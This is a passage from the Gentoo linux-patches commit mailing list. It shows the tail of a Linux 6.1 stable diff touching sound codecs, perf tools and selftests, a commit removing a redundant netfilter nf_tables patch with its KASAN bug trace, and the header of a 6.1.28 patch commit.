+-	case WCD938X_DIGITAL_EFUSE_REG_21:
+-	case WCD938X_DIGITAL_EFUSE_REG_22:
+-	case WCD938X_DIGITAL_EFUSE_REG_23:
+-	case WCD938X_DIGITAL_EFUSE_REG_24:
+-	case WCD938X_DIGITAL_EFUSE_REG_25:
+-	case WCD938X_DIGITAL_EFUSE_REG_26:
+-	case WCD938X_DIGITAL_EFUSE_REG_27:
+-	case WCD938X_DIGITAL_EFUSE_REG_28:
+-	case WCD938X_DIGITAL_EFUSE_REG_29:
+-	case WCD938X_DIGITAL_EFUSE_REG_30:
+-	case WCD938X_DIGITAL_EFUSE_REG_31:
+-		return true;
+-	}
+-	return false;
+-}
+-
+-static bool wcd938x_readable_register(struct device *dev, unsigned int reg)
+-{
+-	bool ret;
+-
+-	ret = wcd938x_readonly_register(dev, reg);
+-	if (!ret)
+-		return wcd938x_rdwr_register(dev, reg);
+-
+-	return ret;
+-}
+-
+-static bool wcd938x_writeable_register(struct device *dev, unsigned int reg)
+-{
+-	return wcd938x_rdwr_register(dev, reg);
+-}
+-
+-static bool wcd938x_volatile_register(struct device *dev, unsigned int reg)
+-{
+-	if (reg <= WCD938X_BASE_ADDRESS)
+-		return false;
+-
+-	if (reg == WCD938X_DIGITAL_SWR_TX_CLK_RATE)
+-		return true;
+-
+-	if (wcd938x_readonly_register(dev, reg))
+-		return true;
+-
+-	return false;
+-}
+-
+-static struct regmap_config wcd938x_regmap_config = {
+-	.name = "wcd938x_csr",
+-	.reg_bits = 32,
+-	.val_bits = 8,
+-	.cache_type = REGCACHE_RBTREE,
+-	.reg_defaults = wcd938x_defaults,
+-	.num_reg_defaults = ARRAY_SIZE(wcd938x_defaults),
+-	.max_register = WCD938X_MAX_REGISTER,
+-	.readable_reg = wcd938x_readable_register,
+-	.writeable_reg = wcd938x_writeable_register,
+-	.volatile_reg = wcd938x_volatile_register,
+-	.can_multi_write = true,
+-};
+-
+ static const struct regmap_irq wcd938x_irqs[WCD938X_NUM_IRQS] = {
+ 	REGMAP_IRQ_REG(WCD938X_IRQ_MBHC_BUTTON_PRESS_DET, 0, 0x01),
+ 	REGMAP_IRQ_REG(WCD938X_IRQ_MBHC_BUTTON_RELEASE_DET, 0, 0x02),
+@@ -4412,10 +3417,10 @@ static int wcd938x_bind(struct device *dev)
+ 		return -EINVAL;
+ 	}
+ 
+-	wcd938x->regmap = devm_regmap_init_sdw(wcd938x->tx_sdw_dev, &wcd938x_regmap_config);
+-	if (IS_ERR(wcd938x->regmap)) {
+-		dev_err(dev, "%s: tx csr regmap not found\n", __func__);
+-		return PTR_ERR(wcd938x->regmap);
++	wcd938x->regmap = dev_get_regmap(&wcd938x->tx_sdw_dev->dev, NULL);
++	if (!wcd938x->regmap) {
++		dev_err(dev, "could not get TX device regmap\n");
++		return -EINVAL;
+ 	}
+ 
+ 	ret = wcd938x_irq_init(wcd938x, dev);
+diff --git a/sound/soc/codecs/wcd938x.h b/sound/soc/codecs/wcd938x.h
+index ea82039e78435..74b1498fec38b 100644
+--- a/sound/soc/codecs/wcd938x.h
++++ b/sound/soc/codecs/wcd938x.h
+@@ -663,6 +663,7 @@ struct wcd938x_sdw_priv {
+ 	bool is_tx;
+ 	struct wcd938x_priv *wcd938x;
+ 	struct irq_domain *slave_irq;
++	struct regmap *regmap;
+ };
+ 
+ #if IS_ENABLED(CONFIG_SND_SOC_WCD938X_SDW)
+diff --git a/sound/soc/codecs/wsa881x.c b/sound/soc/codecs/wsa881x.c
+index 6c8b1db649b89..046843b57b038 100644
+--- a/sound/soc/codecs/wsa881x.c
++++ b/sound/soc/codecs/wsa881x.c
+@@ -1101,7 +1101,7 @@ static int wsa881x_bus_config(struct sdw_slave *slave,
+ 	return 0;
+ }
+ 
+-static struct sdw_slave_ops wsa881x_slave_ops = {
++static const struct sdw_slave_ops wsa881x_slave_ops = {
+ 	.update_status = wsa881x_update_status,
+ 	.bus_config = wsa881x_bus_config,
+ 	.port_prep = wsa881x_port_prep,
+diff --git a/sound/soc/codecs/wsa883x.c b/sound/soc/codecs/wsa883x.c
+index 2533d0973529f..6e9a64c5948e2 100644
+--- a/sound/soc/codecs/wsa883x.c
++++ b/sound/soc/codecs/wsa883x.c
+@@ -1073,7 +1073,7 @@ static int wsa883x_port_prep(struct sdw_slave *slave,
+ 	return 0;
+ }
+ 
+-static struct sdw_slave_ops wsa883x_slave_ops = {
++static const struct sdw_slave_ops wsa883x_slave_ops = {
+ 	.update_status = wsa883x_update_status,
+ 	.port_prep = wsa883x_port_prep,
+ };
+diff --git a/sound/soc/intel/common/soc-acpi-intel-byt-match.c b/sound/soc/intel/common/soc-acpi-intel-byt-match.c
+index db5a92b9875a8..87c44f284971a 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-byt-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-byt-match.c
+@@ -124,7 +124,7 @@ static const struct snd_soc_acpi_codecs rt5640_comp_ids = {
+ };
+ 
+ static const struct snd_soc_acpi_codecs wm5102_comp_ids = {
+-	.num_codecs = 2,
++	.num_codecs = 3,
+ 	.codecs = { "10WM5102", "WM510204", "WM510205"},
+ };
+ 
+diff --git a/sound/usb/caiaq/input.c b/sound/usb/caiaq/input.c
+index 1e2cf2f08eecd..84f26dce7f5d0 100644
+--- a/sound/usb/caiaq/input.c
++++ b/sound/usb/caiaq/input.c
+@@ -804,6 +804,7 @@ int snd_usb_caiaq_input_init(struct snd_usb_caiaqdev *cdev)
+ 
+ 	default:
+ 		/* no input methods supported on this device */
++		ret = -EINVAL;
+ 		goto exit_free_idev;
+ 	}
+ 
+diff --git a/tools/perf/builtin-ftrace.c b/tools/perf/builtin-ftrace.c
+index 7de07bb16d235..4bc5b7cf3e04b 100644
+--- a/tools/perf/builtin-ftrace.c
++++ b/tools/perf/builtin-ftrace.c
+@@ -1228,10 +1228,12 @@ int cmd_ftrace(int argc, const char **argv)
+ 		goto out_delete_filters;
+ 	}
+ 
++	/* Make system wide (-a) the default target. */
++	if (!argc && target__none(&ftrace.target))
++		ftrace.target.system_wide = true;
++
+ 	switch (subcmd) {
+ 	case PERF_FTRACE_TRACE:
+-		if (!argc && target__none(&ftrace.target))
+-			ftrace.target.system_wide = true;
+ 		cmd_func = __cmd_ftrace;
+ 		break;
+ 	case PERF_FTRACE_LATENCY:
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index 48c3461b496c4..7314183cdcb6c 100644
+--- a/tools/perf/builtin-record.c
++++ b/tools/perf/builtin-record.c
+@@ -1864,7 +1864,7 @@ static void __record__read_lost_samples(struct record *rec, struct evsel *evsel,
+ 	int id_hdr_size;
+ 
+ 	if (perf_evsel__read(&evsel->core, cpu_idx, thread_idx, &count) < 0) {
+-		pr_err("read LOST count failed\n");
++		pr_debug("read LOST count failed\n");
+ 		return;
+ 	}
+ 
+diff --git a/tools/perf/builtin-stat.c b/tools/perf/builtin-stat.c
+index f6427e3a47421..a2c74a34e4a44 100644
+--- a/tools/perf/builtin-stat.c
++++ b/tools/perf/builtin-stat.c
+@@ -765,7 +765,7 @@ static int __run_perf_stat(int argc, const char **argv, int run_idx)
+ 		counter->reset_group = false;
+ 		if (bpf_counter__load(counter, &target))
+ 			return -1;
+-		if (!evsel__is_bpf(counter))
++		if (!(evsel__is_bperf(counter)))
+ 			all_counters_use_bpf = false;
+ 	}
+ 
+@@ -781,7 +781,7 @@ static int __run_perf_stat(int argc, const char **argv, int run_idx)
+ 
+ 		if (counter->reset_group || counter->errored)
+ 			continue;
+-		if (evsel__is_bpf(counter))
++		if (evsel__is_bperf(counter))
+ 			continue;
+ try_again:
+ 		if (create_perf_stat_counter(counter, &stat_config, &target,
+diff --git a/tools/perf/pmu-events/arch/powerpc/power9/other.json b/tools/perf/pmu-events/arch/powerpc/power9/other.json
+index 3f69422c21f99..f10bd554521a0 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power9/other.json
++++ b/tools/perf/pmu-events/arch/powerpc/power9/other.json
+@@ -1417,7 +1417,7 @@
+   {
+     "EventCode": "0x45054",
+     "EventName": "PM_FMA_CMPL",
+-    "BriefDescription": "two flops operation completed (fmadd, fnmadd, fmsub, fnmsub) Scalar instructions only. "
++    "BriefDescription": "two flops operation completed (fmadd, fnmadd, fmsub, fnmsub) Scalar instructions only."
+   },
+   {
+     "EventCode": "0x201E8",
+@@ -2017,7 +2017,7 @@
+   {
+     "EventCode": "0xC0BC",
+     "EventName": "PM_LSU_FLUSH_OTHER",
+-    "BriefDescription": "Other LSU flushes including: Sync (sync ack from L2 caused search of LRQ for oldest snooped load, This will either signal a Precise Flush of the oldest snooped loa or a Flush Next PPC); Data Valid Flush Next (several cases of this, one example is store and reload are lined up such that a store-hit-reload scenario exists and the CDF has already launched and has gotten bad/stale data); Bad Data Valid Flush Next (might be a few cases of this, one example is a larxa (D$ hit) return data and dval but can't allocate to LMQ (LMQ full or other reason). Already gave dval but can't watch it for snoop_hit_larx. Need to take the “bad dval” back and flush all younger ops)"
++    "BriefDescription": "Other LSU flushes including: Sync (sync ack from L2 caused search of LRQ for oldest snooped load, This will either signal a Precise Flush of the oldest snooped loa or a Flush Next PPC); Data Valid Flush Next (several cases of this, one example is store and reload are lined up such that a store-hit-reload scenario exists and the CDF has already launched and has gotten bad/stale data); Bad Data Valid Flush Next (might be a few cases of this, one example is a larxa (D$ hit) return data and dval but can't allocate to LMQ (LMQ full or other reason). Already gave dval but can't watch it for snoop_hit_larx. Need to take the 'bad dval' back and flush all younger ops)"
+   },
+   {
+     "EventCode": "0x5094",
+diff --git a/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json b/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json
+index d0265f255de2b..723bffa41c448 100644
+--- a/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json
++++ b/tools/perf/pmu-events/arch/powerpc/power9/pipeline.json
+@@ -442,7 +442,7 @@
+   {
+     "EventCode": "0x4D052",
+     "EventName": "PM_2FLOP_CMPL",
+-    "BriefDescription": "DP vector version of fmul, fsub, fcmp, fsel, fabs, fnabs, fres ,fsqrte, fneg "
++    "BriefDescription": "DP vector version of fmul, fsub, fcmp, fsel, fabs, fnabs, fres ,fsqrte, fneg"
+   },
+   {
+     "EventCode": "0x1F142",
+diff --git a/tools/perf/pmu-events/arch/s390/cf_z16/extended.json b/tools/perf/pmu-events/arch/s390/cf_z16/extended.json
+index c306190fc06f2..c2b10ec1c6e01 100644
+--- a/tools/perf/pmu-events/arch/s390/cf_z16/extended.json
++++ b/tools/perf/pmu-events/arch/s390/cf_z16/extended.json
+@@ -95,28 +95,28 @@
+ 		"EventCode": "145",
+ 		"EventName": "DCW_REQ",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+ 		"EventCode": "146",
+ 		"EventName": "DCW_REQ_IV",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache with Intervention",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache with intervention."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache with intervention."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+ 		"EventCode": "147",
+ 		"EventName": "DCW_REQ_CHIP_HIT",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache with Chip HP Hit",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache after using chip level horizontal persistence, Chip-HP hit."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache after using chip level horizontal persistence, Chip-HP hit."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+ 		"EventCode": "148",
+ 		"EventName": "DCW_REQ_DRAWER_HIT",
+ 		"BriefDescription": "Directory Write Level 1 Data Cache from Cache with Drawer HP Hit",
+-		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestor’s Level-2 cache after using drawer level horizontal persistence, Drawer-HP hit."
++		"PublicDescription": "A directory write to the Level-1 Data cache directory where the returned cache line was sourced from the requestors Level-2 cache after using drawer level horizontal persistence, Drawer-HP hit."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+@@ -284,7 +284,7 @@
+ 		"EventCode": "172",
+ 		"EventName": "ICW_REQ_DRAWER_HIT",
+ 		"BriefDescription": "Directory Write Level 1 Instruction Cache from Cache with Drawer HP Hit",
+-		"PublicDescription": "A directory write to the Level-1 Instruction cache directory where the returned cache line was sourced from the requestor’s Level-2 cache using drawer level horizontal persistence, Drawer-HP hit."
++		"PublicDescription": "A directory write to the Level-1 Instruction cache directory where the returned cache line was sourced from the requestors Level-2 cache using drawer level horizontal persistence, Drawer-HP hit."
+ 	},
+ 	{
+ 		"Unit": "CPU-M-CF",
+diff --git a/tools/perf/scripts/python/intel-pt-events.py b/tools/perf/scripts/python/intel-pt-events.py
+index 6be7fd8fd6158..8058b2fc2b686 100644
+--- a/tools/perf/scripts/python/intel-pt-events.py
++++ b/tools/perf/scripts/python/intel-pt-events.py
+@@ -11,7 +11,7 @@
+ # FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for
+ # more details.
+ 
+-from __future__ import print_function
++from __future__ import division, print_function
+ 
+ import os
+ import sys
+diff --git a/tools/perf/tests/shell/record_offcpu.sh b/tools/perf/tests/shell/record_offcpu.sh
+index d2eba583a2ac9..054272750aa9c 100755
+--- a/tools/perf/tests/shell/record_offcpu.sh
++++ b/tools/perf/tests/shell/record_offcpu.sh
+@@ -65,7 +65,7 @@ test_offcpu_child() {
+ 
+   # perf bench sched messaging creates 400 processes
+   if ! perf record --off-cpu -e dummy -o ${perfdata} -- \
+-    perf bench sched messaging -g 10 > /dev/null 2&>1
++    perf bench sched messaging -g 10 > /dev/null 2>&1
+   then
+     echo "Child task off-cpu test [Failed record]"
+     err=1
+diff --git a/tools/perf/util/cs-etm.c b/tools/perf/util/cs-etm.c
+index 16db965ac995e..09e240e4477d0 100644
+--- a/tools/perf/util/cs-etm.c
++++ b/tools/perf/util/cs-etm.c
+@@ -2488,26 +2488,29 @@ static int cs_etm__process_auxtrace_event(struct perf_session *session,
+ 	return 0;
+ }
+ 
+-static bool cs_etm__is_timeless_decoding(struct cs_etm_auxtrace *etm)
++static int cs_etm__setup_timeless_decoding(struct cs_etm_auxtrace *etm)
+ {
+ 	struct evsel *evsel;
+ 	struct evlist *evlist = etm->session->evlist;
+-	bool timeless_decoding = true;
+ 
+ 	/* Override timeless mode with user input from --itrace=Z */
+-	if (etm->synth_opts.timeless_decoding)
+-		return true;
++	if (etm->synth_opts.timeless_decoding) {
++		etm->timeless_decoding = true;
++		return 0;
++	}
+ 
+ 	/*
+-	 * Circle through the list of event and complain if we find one
+-	 * with the time bit set.
++	 * Find the cs_etm evsel and look at what its timestamp setting was
+ 	 */
+-	evlist__for_each_entry(evlist, evsel) {
+-		if ((evsel->core.attr.sample_type & PERF_SAMPLE_TIME))
+-			timeless_decoding = false;
+-	}
++	evlist__for_each_entry(evlist, evsel)
++		if (cs_etm__evsel_is_auxtrace(etm->session, evsel)) {
++			etm->timeless_decoding =
++				!(evsel->core.attr.config & BIT(ETM_OPT_TS));
++			return 0;
++		}
+ 
+-	return timeless_decoding;
++	pr_err("CS ETM: Couldn't find ETM evsel\n");
++	return -EINVAL;
+ }
+ 
+ static const char * const cs_etm_global_header_fmts[] = {
+@@ -3051,7 +3054,6 @@ int cs_etm__process_auxtrace_info(union perf_event *event,
+ 	etm->snapshot_mode = (hdr[CS_ETM_SNAPSHOT] != 0);
+ 	etm->metadata = metadata;
+ 	etm->auxtrace_type = auxtrace_info->type;
+-	etm->timeless_decoding = cs_etm__is_timeless_decoding(etm);
+ 
+ 	etm->auxtrace.process_event = cs_etm__process_event;
+ 	etm->auxtrace.process_auxtrace_event = cs_etm__process_auxtrace_event;
+@@ -3061,6 +3063,10 @@ int cs_etm__process_auxtrace_info(union perf_event *event,
+ 	etm->auxtrace.evsel_is_auxtrace = cs_etm__evsel_is_auxtrace;
+ 	session->auxtrace = &etm->auxtrace;
+ 
++	err = cs_etm__setup_timeless_decoding(etm);
++	if (err)
++		return err;
++
+ 	etm->unknown_thread = thread__new(999999999, 999999999);
+ 	if (!etm->unknown_thread) {
+ 		err = -ENOMEM;
+diff --git a/tools/perf/util/evsel.h b/tools/perf/util/evsel.h
+index 989865e16aadd..8ce30329a0772 100644
+--- a/tools/perf/util/evsel.h
++++ b/tools/perf/util/evsel.h
+@@ -263,6 +263,11 @@ static inline bool evsel__is_bpf(struct evsel *evsel)
+ 	return evsel->bpf_counter_ops != NULL;
+ }
+ 
++static inline bool evsel__is_bperf(struct evsel *evsel)
++{
++	return evsel->bpf_counter_ops != NULL && list_empty(&evsel->bpf_counter_list);
++}
++
+ #define EVSEL__MAX_ALIASES 8
+ 
+ extern const char *const evsel__hw_cache[PERF_COUNT_HW_CACHE_MAX][EVSEL__MAX_ALIASES];
+diff --git a/tools/perf/util/pmu.c b/tools/perf/util/pmu.c
+index 03284059175f7..9a762c0cc53ce 100644
+--- a/tools/perf/util/pmu.c
++++ b/tools/perf/util/pmu.c
+@@ -1845,7 +1845,7 @@ static int perf_pmu__new_caps(struct list_head *list, char *name, char *value)
+ 	return 0;
+ 
+ free_name:
+-	zfree(caps->name);
++	zfree(&caps->name);
+ free_caps:
+ 	free(caps);
+ 
+diff --git a/tools/perf/util/sort.c b/tools/perf/util/sort.c
+index 2e7330867e2ef..6882b17144994 100644
+--- a/tools/perf/util/sort.c
++++ b/tools/perf/util/sort.c
+@@ -876,8 +876,7 @@ static int hist_entry__dso_to_filter(struct hist_entry *he, int type,
+ static int64_t
+ sort__sym_from_cmp(struct hist_entry *left, struct hist_entry *right)
+ {
+-	struct addr_map_symbol *from_l = &left->branch_info->from;
+-	struct addr_map_symbol *from_r = &right->branch_info->from;
++	struct addr_map_symbol *from_l, *from_r;
+ 
+ 	if (!left->branch_info || !right->branch_info)
+ 		return cmp_null(left->branch_info, right->branch_info);
+diff --git a/tools/perf/util/symbol-elf.c b/tools/perf/util/symbol-elf.c
+index 80345695b1360..29c9348c30f00 100644
+--- a/tools/perf/util/symbol-elf.c
++++ b/tools/perf/util/symbol-elf.c
+@@ -553,7 +553,7 @@ static int elf_read_build_id(Elf *elf, void *bf, size_t size)
+ 				size_t sz = min(size, descsz);
+ 				memcpy(bf, ptr, sz);
+ 				memset(bf + sz, 0, size - sz);
+-				err = descsz;
++				err = sz;
+ 				break;
+ 			}
+ 		}
+diff --git a/tools/perf/util/tracepoint.c b/tools/perf/util/tracepoint.c
+index 89ef56c433110..92dd8b455b902 100644
+--- a/tools/perf/util/tracepoint.c
++++ b/tools/perf/util/tracepoint.c
+@@ -50,6 +50,7 @@ int is_valid_tracepoint(const char *event_string)
+ 				 sys_dirent->d_name, evt_dirent->d_name);
+ 			if (!strcmp(evt_path, event_string)) {
+ 				closedir(evt_dir);
++				put_events_file(dir_path);
+ 				closedir(sys_dir);
+ 				return 1;
+ 			}
+diff --git a/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh b/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh
+index aebaab8ce44cb..441eededa0312 100755
+--- a/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh
++++ b/tools/testing/selftests/net/srv6_end_dt46_l3vpn_test.sh
+@@ -292,6 +292,11 @@ setup_hs()
+ 	ip netns exec ${hsname} sysctl -wq net.ipv6.conf.all.accept_dad=0
+ 	ip netns exec ${hsname} sysctl -wq net.ipv6.conf.default.accept_dad=0
+ 
++	# disable the rp_filter otherwise the kernel gets confused about how
++	# to route decap ipv4 packets.
++	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.all.rp_filter=0
++	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.default.rp_filter=0
++
+ 	ip -netns ${hsname} link add veth0 type veth peer name ${rtveth}
+ 	ip -netns ${hsname} link set ${rtveth} netns ${rtname}
+ 	ip -netns ${hsname} addr add ${IPv6_HS_NETWORK}::${hs}/64 dev veth0 nodad
+@@ -316,11 +321,6 @@ setup_hs()
+ 	ip netns exec ${rtname} sysctl -wq net.ipv6.conf.${rtveth}.proxy_ndp=1
+ 	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.${rtveth}.proxy_arp=1
+ 
+-	# disable the rp_filter otherwise the kernel gets confused about how
+-	# to route decap ipv4 packets.
+-	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.all.rp_filter=0
+-	ip netns exec ${rtname} sysctl -wq net.ipv4.conf.${rtveth}.rp_filter=0
+-
+ 	ip netns exec ${rtname} sh -c "echo 1 > /proc/sys/net/vrf/strict_mode"
+ }
+ 
+diff --git a/tools/testing/selftests/netfilter/Makefile b/tools/testing/selftests/netfilter/Makefile
+index 4504ee07be08d..3686bfa6c58d7 100644
+--- a/tools/testing/selftests/netfilter/Makefile
++++ b/tools/testing/selftests/netfilter/Makefile
+@@ -8,8 +8,11 @@ TEST_PROGS := nft_trans_stress.sh nft_fib.sh nft_nat.sh bridge_brouter.sh \
+ 	ipip-conntrack-mtu.sh conntrack_tcp_unreplied.sh \
+ 	conntrack_vrf.sh nft_synproxy.sh rpath.sh
+ 
+-CFLAGS += $(shell pkg-config --cflags libmnl 2>/dev/null || echo "-I/usr/include/libmnl")
+-LDLIBS = -lmnl
++HOSTPKG_CONFIG := pkg-config
++
++CFLAGS += $(shell $(HOSTPKG_CONFIG) --cflags libmnl 2>/dev/null)
++LDLIBS += $(shell $(HOSTPKG_CONFIG) --libs libmnl 2>/dev/null || echo -lmnl)
++
+ TEST_GEN_FILES =  nf-queue connect_close
+ 
+ include ../lib.mk


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-11 16:08 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-05-11 16:08 UTC (permalink / raw
  To: gentoo-commits

commit:     ca9160a5400fac4d1f0c0fb82f42c9c481e63aa3
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu May 11 16:07:47 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu May 11 16:07:47 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=ca9160a5

Remove redundant patch

Removed:
1520_nf-tables-make-deleted-anon-sets-inactive.patch

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |   4 -
 ...nf-tables-make-deleted-anon-sets-inactive.patch | 121 ---------------------
 2 files changed, 125 deletions(-)

diff --git a/0000_README b/0000_README
index c442268b..dd54d67d 100644
--- a/0000_README
+++ b/0000_README
@@ -163,10 +163,6 @@ Patch:  1510_fs-enable-link-security-restrictions-by-default.patch
 From:   http://sources.debian.net/src/linux/3.16.7-ckt4-3/debian/patches/debian/fs-enable-link-security-restrictions-by-default.patch/
 Desc:   Enable link security restrictions by default.
 
-Patch:  1520_fs-enable-link-security-restrictions-by-default.patch
-From:   https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=c1592a89942e9678f7d9c8030efa777c0d57edab
-Desc:   netfilter: nf_tables: deactivate anonymous set from preparation phase
-
 Patch:  1700_sparc-address-warray-bound-warnings.patch
 From:		https://github.com/KSPP/linux/issues/109
 Desc:		Address -Warray-bounds warnings 

diff --git a/1520_nf-tables-make-deleted-anon-sets-inactive.patch b/1520_nf-tables-make-deleted-anon-sets-inactive.patch
deleted file mode 100644
index cd75de5c..00000000
--- a/1520_nf-tables-make-deleted-anon-sets-inactive.patch
+++ /dev/null
@@ -1,121 +0,0 @@
-From c1592a89942e9678f7d9c8030efa777c0d57edab Mon Sep 17 00:00:00 2001
-From: Pablo Neira Ayuso <pablo@netfilter.org>
-Date: Tue, 2 May 2023 10:25:24 +0200
-Subject: netfilter: nf_tables: deactivate anonymous set from preparation phase
-
-Toggle deleted anonymous sets as inactive in the next generation, so
-users cannot perform any update on it. Clear the generation bitmask
-in case the transaction is aborted.
-
-The following KASAN splat shows a set element deletion for a bound
-anonymous set that has been already removed in the same transaction.
-
-[   64.921510] ==================================================================
-[   64.923123] BUG: KASAN: wild-memory-access in nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.924745] Write of size 8 at addr dead000000000122 by task test/890
-[   64.927903] CPU: 3 PID: 890 Comm: test Not tainted 6.3.0+ #253
-[   64.931120] Call Trace:
-[   64.932699]  <TASK>
-[   64.934292]  dump_stack_lvl+0x33/0x50
-[   64.935908]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.937551]  kasan_report+0xda/0x120
-[   64.939186]  ? nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.940814]  nf_tables_commit+0xa24/0x1490 [nf_tables]
-[   64.942452]  ? __kasan_slab_alloc+0x2d/0x60
-[   64.944070]  ? nf_tables_setelem_notify+0x190/0x190 [nf_tables]
-[   64.945710]  ? kasan_set_track+0x21/0x30
-[   64.947323]  nfnetlink_rcv_batch+0x709/0xd90 [nfnetlink]
-[   64.948898]  ? nfnetlink_rcv_msg+0x480/0x480 [nfnetlink]
-
-Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
----
- include/net/netfilter/nf_tables.h |  1 +
- net/netfilter/nf_tables_api.c     | 12 ++++++++++++
- net/netfilter/nft_dynset.c        |  2 +-
- net/netfilter/nft_lookup.c        |  2 +-
- net/netfilter/nft_objref.c        |  2 +-
- 5 files changed, 16 insertions(+), 3 deletions(-)
-
-diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
-index 3ed21d2d56590..2e24ea1d744c2 100644
---- a/include/net/netfilter/nf_tables.h
-+++ b/include/net/netfilter/nf_tables.h
-@@ -619,6 +619,7 @@ struct nft_set_binding {
- };
- 
- enum nft_trans_phase;
-+void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set);
- void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
- 			      struct nft_set_binding *binding,
- 			      enum nft_trans_phase phase);
-diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
-index 8b6c61a2196cb..59fb8320ab4d7 100644
---- a/net/netfilter/nf_tables_api.c
-+++ b/net/netfilter/nf_tables_api.c
-@@ -5127,12 +5127,24 @@ static void nf_tables_unbind_set(const struct nft_ctx *ctx, struct nft_set *set,
- 	}
- }
- 
-+void nf_tables_activate_set(const struct nft_ctx *ctx, struct nft_set *set)
-+{
-+	if (nft_set_is_anonymous(set))
-+		nft_clear(ctx->net, set);
-+
-+	set->use++;
-+}
-+EXPORT_SYMBOL_GPL(nf_tables_activate_set);
-+
- void nf_tables_deactivate_set(const struct nft_ctx *ctx, struct nft_set *set,
- 			      struct nft_set_binding *binding,
- 			      enum nft_trans_phase phase)
- {
- 	switch (phase) {
- 	case NFT_TRANS_PREPARE:
-+		if (nft_set_is_anonymous(set))
-+			nft_deactivate_next(ctx->net, set);
-+
- 		set->use--;
- 		return;
- 	case NFT_TRANS_ABORT:
-diff --git a/net/netfilter/nft_dynset.c b/net/netfilter/nft_dynset.c
-index 274579b1696e0..bd19c7aec92ee 100644
---- a/net/netfilter/nft_dynset.c
-+++ b/net/netfilter/nft_dynset.c
-@@ -342,7 +342,7 @@ static void nft_dynset_activate(const struct nft_ctx *ctx,
- {
- 	struct nft_dynset *priv = nft_expr_priv(expr);
- 
--	priv->set->use++;
-+	nf_tables_activate_set(ctx, priv->set);
- }
- 
- static void nft_dynset_destroy(const struct nft_ctx *ctx,
-diff --git a/net/netfilter/nft_lookup.c b/net/netfilter/nft_lookup.c
-index cecf8ab90e58f..03ef4fdaa460b 100644
---- a/net/netfilter/nft_lookup.c
-+++ b/net/netfilter/nft_lookup.c
-@@ -167,7 +167,7 @@ static void nft_lookup_activate(const struct nft_ctx *ctx,
- {
- 	struct nft_lookup *priv = nft_expr_priv(expr);
- 
--	priv->set->use++;
-+	nf_tables_activate_set(ctx, priv->set);
- }
- 
- static void nft_lookup_destroy(const struct nft_ctx *ctx,
-diff --git a/net/netfilter/nft_objref.c b/net/netfilter/nft_objref.c
-index cb37169608bab..a48dd5b5d45b1 100644
---- a/net/netfilter/nft_objref.c
-+++ b/net/netfilter/nft_objref.c
-@@ -185,7 +185,7 @@ static void nft_objref_map_activate(const struct nft_ctx *ctx,
- {
- 	struct nft_objref_map *priv = nft_expr_priv(expr);
- 
--	priv->set->use++;
-+	nf_tables_activate_set(ctx, priv->set);
- }
- 
- static void nft_objref_map_destroy(const struct nft_ctx *ctx,
--- 
-cgit 
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-05-11 14:49 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-05-11 14:49 UTC (permalink / raw
  To: gentoo-commits

commit:     dcba6756d2c93a2d48af31c1a0e3c7516dde24ec
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu May 11 14:49:23 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu May 11 14:49:23 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=dcba6756

Linux patch 6.1.28

